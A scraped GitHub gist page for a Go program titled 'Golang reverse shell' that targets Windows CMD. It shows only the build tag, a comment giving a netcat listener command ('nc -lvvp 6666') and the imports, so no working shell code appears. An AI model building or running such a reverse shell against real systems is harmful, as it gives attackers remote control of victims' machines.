Skip to content

Instantly share code, notes, and snippets.

View hdbreaker's full-sized avatar

Alejandro Parodi hdbreaker

View GitHub Profile
@yougg
yougg / reversecmd.go
Last active October 23, 2025 06:25 — forked from takeshixx/shell.go
Golang reverse shell
// +build windows
// Reverse Windows CMD
// Test with nc -lvvp 6666
package main
import (
"bufio"
"net"
"os/exec"